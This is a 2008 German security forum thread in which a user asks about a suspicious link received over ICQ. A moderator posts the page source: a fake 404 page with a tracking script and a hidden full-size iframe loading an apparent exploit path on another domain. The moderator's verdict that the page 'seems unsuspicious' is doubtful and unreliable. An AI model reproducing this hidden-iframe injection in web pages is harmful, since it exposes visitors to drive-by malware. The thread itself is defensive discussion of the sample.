Hackerboard Wiki HaboBlog
Hackerboard bei Facebook Hackerboard bei Google+ Hackerboard bei Twitter

[HaBo]

 
(In)security allgemein Sicherheit, Anonymität im Netz. Schutz und Maßnahmen. Prävention und Konzepte. Sicherheitsarchitekturen allgemein und auf der Netzwerkebene.

Exploit?

Diskussion: Exploit? im Forum (In)security allgemein, in der Kategorie Security Area; Anzeige Ebend hat mich jemand in icq geaddet und mir ein link geschickt, und ich depp hab geklickt... h**p://networklab.info/blog/user=02738972 --- ...

Antwort
Alt 29.04.08, 22:29   #1 (permalink)
 
Registriert seit: 29.04.08
ozeo Leistung: Facit NTK
Likes: 0
Standard Exploit?

Anzeige

Ebend hat mich jemand in icq geaddet und mir ein link geschickt, und ich depp hab geklickt...

h**p://networklab.info/blog/user=02738972

--- edit von lightsaver ---

DIESER LINK BEINHALTET HÖCHSTWAHRSCHEINLICH SCHADCODE, ANKLICKEN ALSO NUR AUF EINEM TESTRECHNER ODER ÄHNLICHEM!

--- /edit ---


Es erscheint (meiner Meinung nach) ne gefakte 404 Seite, und im Quelltext ist ein script!
Kann sich das mal jemand anschauen, und sagen, was das is?
Bevör ich jetzt alle PW´s ändere

ozeo ist offline   Mit Zitat antworten
Alt 29.04.08, 22:51   #2 (permalink)
Moderator
 
Benutzerbild von lightsaver
 
Registriert seit: 19.06.06
lightsaver Leistung: Pentium Ilightsaver Leistung: Pentium Ilightsaver Leistung: Pentium I
Likes: 52
Standard

ich sitze grad nicht an einem testrechner, kann den link also nicht mal überprüfen. mein firefox warnt mich auf jeden fall vor der seite.
wenn du glück hast, wurden nur deine passwörter geklaut, wenn du pech hast, wurde auch ein trojaner oder ähnliches installiert
lightsaver ist offline   Mit Zitat antworten
   
HaBOT
 
- Anzeige -

Werbung ist gerade online    
Alt 29.04.08, 23:02   #3 (permalink)
Moderator
 
Benutzerbild von Elderan
 
Registriert seit: 30.03.04
Elderan Leistung: 8086
Likes: 14
Standard

Hallo,
hier die Seite:
Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- CNStats begin --><script type="text/javascript">
cnsd=document;cnst=escape(cnsd.title);
cnst=cnst.replace(/\+/g,'%2B');cnsa=navigator.appName;
cnsn=(cnsa.substring(0,2)=='Mi')?0:1;cnss=screen;cnspx=(cnsn==0)?cnss.colorDepth:cnss.pixelDepth;
document.write('<img src="http://networklab.info/cnstats/cnt-combined.php?i=45334&amp;e='+cnss.width+'.'+cnss.height+'&amp;d='+cnspx+'&amp;r='+escape(cnsd.referrer)+'&amp;p='+escape(cnsd.location)+'&amp;t='+cnst+'" width="1" height="1" border="0">');
</script><noscript><img src="http://networklab.info/cnstats/cnt-combined.php?i=45334" width="1" height="1" border="0" alt="" /></noscript><!-- CNStats end --><HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<h1>Not Found</h1>
<p>The requested URL /blog/user=02738972 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.0 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Server at networklab.info Port 80</address>

<iframe src='http://germanyforum.info/spl1/' width='100%' height='100%' style='visibility: hidden;'></iframe>
</BODY>
</HTML>
Scheint unverdächtig zu sein, bzw. ein DDoS Angriff gegen germanforum.info.
Wenn man die Seite aufruft, bekommt man 'fuck you bech'.
Elderan ist offline   Mit Zitat antworten
Alt 30.04.08, 01:23   #4 (permalink)
 
Registriert seit: 17.10.06
:::Lük::: Leistung: Facit NTK
:::Lük::: eine Nachricht über ICQ schicken
Likes: 0
Standard

Ich dachte immer, dass die Webtechniken alle so gesichert sein, dass ein unkontrollierter Zugriff auf die Festplatte unmöglich wäre. Was kann denn nun im schlimmsten Falle mit einer Webseite angestellt werden?
:::Lük::: ist offline   Mit Zitat antworten
Alt 30.04.08, 01:49   #5 (permalink)
Themenstarter
 
Registriert seit: 29.04.08
ozeo Leistung: Facit NTK
Likes: 0
Standard

Exploits können auf websiten sein, die verschiedenste Sicherheitslücken ausnutzten, um Trojaner oder PassStealer zu installieren...
ozeo ist offline   Mit Zitat antworten
Alt 30.04.08, 13:37   #6 (permalink)
Moderator
 
Benutzerbild von Elderan
 
Registriert seit: 30.03.04
Elderan Leistung: 8086
Likes: 14
Standard

Hallo,
Zitat:
Original von :::Lük:::
Ich dachte immer, dass die Webtechniken alle so gesichert sein, dass ein unkontrollierter Zugriff auf die Festplatte unmöglich wäre. Was kann denn nun im schlimmsten Falle mit einer Webseite angestellt werden?
Ziel ist es schon, aber die Realität sieht anders aus:
Drive-by-Download (evt. mal die heise.de Artikel unter Quellen angucken)
Elderan ist offline   Mit Zitat antworten
Antwort
   
- Anzeige -

Werbung ist gerade online    

[HaBo] » Security Area » (In)security allgemein » Exploit?
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind aus
Pingbacks sind aus
Refbacks sind aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Exploit Aim devnull (In)security allgemein 5 27.10.05 18:20
exploit OmeGA Virenschutz · Tools & Aggressive Software 14 27.12.04 00:47
Exploit dbz42 Code Kitchen 0 07.06.04 18:13
WKS Exploit gangstasta Code Kitchen 3 09.03.04 19:08


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61